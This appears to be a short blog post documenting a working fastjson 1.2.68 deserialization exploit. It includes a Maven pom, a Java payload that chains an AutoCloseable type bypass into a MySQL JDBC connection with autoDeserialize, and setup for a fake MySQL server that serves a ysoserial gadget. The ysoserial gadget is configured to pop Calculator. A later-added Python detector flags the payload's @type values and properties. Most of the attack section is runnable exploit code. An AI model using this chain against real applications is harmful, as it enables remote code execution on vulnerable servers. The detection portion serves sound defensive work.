fastjson 1.2.68 exploitation
阿新 • Published: 2021-11-08
I. Environment
Mac M1
java version "1.7.0_21"
JDK download: https://www.oracle.com/java/technologies/javase/javase7-archive-downloads.html
II. pom
    <?xml version="1.0" encoding="UTF-8"?>
    <project xmlns="http://maven.apache.org/POM/4.0.0"
             xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
             xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
        <modelVersion>4.0.0</modelVersion>

        <groupId>org.example</groupId>
        <artifactId>java7_fastjson</artifactId>
        <version>1.0-SNAPSHOT</version>

        <properties>
            <maven.compiler.source>7</maven.compiler.source>
            <maven.compiler.target>7</maven.compiler.target>
        </properties>

        <dependencies>
            <dependency>
                <groupId>com.alibaba</groupId>
                <artifactId>fastjson</artifactId>
                <version>1.2.68</version>
            </dependency>
            <dependency>
                <groupId>mysql</groupId>
                <artifactId>mysql-connector-java</artifactId>
                <version>5.1.29</version>
            </dependency>
        </dependencies>
    </project>
III. Java code
    import com.alibaba.fastjson.JSON;

    public class main {
        public static void main(String[] args){
            String string = "{\"@type\":\"java.lang.AutoCloseable\"{\"@type\":\"com.mysql.jdbc.JDBC4Connection\",\"hostToConnectTo\":\"127.0.0.1\",\"portToConnectTo\":3307,\"info\":{\"user\":\"yso_Jdk7u21_calc\",\"password\":\"oihnqwa\",\"statementInterceptors\":\"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor\",\"autoDeserialize\":\"true\"},\"databaseToConnectTo\":\"test\",\"url\":\"\"}";
            Object obj = JSON.parseObject(string);
            System.out.println(obj.toString());
        }
    }
IV. MySQL Fake Server
https://github.com/fnmsd/MySQL_Fake_Server
1 In config.json, change the Java path
"javaBinPath":"/Library/Java/JavaVirtualMachines/jdk1.7.0_21.jdk/Contents/Home/bin/java",
2 Add a ysoserial jar
3 In server.py, hard-code the command
yso_command = "open /System/Applications/Calculator.app"
    elif username.startswith(b"yso_"):
        query = (yield from packet.read())
        _,yso_type,yso_command = username.decode('ascii').split("_")
        yso_command = "open /System/Applications/Calculator.app"
V. Run
Run the Java code; Calculator pops up successfully.
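From the defender's side, the request body used above can be spotted before it reaches the parser. The following is an added example, not part of the original post: it scans raw text rather than parsed JSON, because the payload here is not well-formed JSON. The watchlists come from the payload in section III; `inspect_body`, `SAMPLES` and the verdict names are hypothetical, and the sample bodies are constructed.

```python
import re

# Assumption: a lenient parser may accept \uXXXX / \xXX escapes inside keys,
# so escapes are decoded before matching.
_ESCAPE = re.compile(r'\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})')
_TYPE_KEY = re.compile(r'"@type"\s*:\s*"([^"\\]*)"')
# Both watchlists are taken from the payload shown on this page.
_WATCHED_TYPES = ("java.lang.AutoCloseable", "com.mysql.jdbc.")
_RISKY_PROPS = ("autoDeserialize", "statementInterceptors")

# Constructed sample request bodies (hypothetical; not captured traffic).
SAMPLES = {
    "page_shaped": '{"@type":"java.lang.AutoCloseable"{"@type":'
                   '"com.mysql.jdbc.JDBC4Connection","info":{'
                   '"statementInterceptors":"x","autoDeserialize":"true"}}',
    "escaped_key": r'{"\u0040type":"com.mysql.jdbc.JDBC4Connection",'
                   r'"info":{"autoDeserialize":"true"}}',
    "other_type": '{"@type":"org.example.Order","id":7}',
    "benign": '{"user":"alice","comment":"what does @type do?"}',
}


def inspect_body(body):
    """Classify a raw request body; works on text, so malformed JSON is fine."""
    text = _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), body)
    types = _TYPE_KEY.findall(text)
    props = [p for p in _RISKY_PROPS
             if re.search(r'"%s"\s*:' % re.escape(p), text)]
    watched = [t for t in types if t.startswith(_WATCHED_TYPES)]
    if watched and props:
        verdict = "block"    # typed JDBC object plus deserialization switches
    elif types:
        verdict = "review"   # any caller-supplied @type deserves a look
    else:
        verdict = "allow"
    return {"verdict": verdict, "types": types, "props": props}


if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, inspect_body(body))
```

A `block` verdict is worth correlating with outbound connections from the application host to unexpected MySQL ports, such as 3307 in the setup above.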
VI. Questions
1 Whether or not it succeeds, this error always appears: "Could not map transaction isolation '11 to a valid JDBC level."
2 How can this be exploited under JDK 1.8?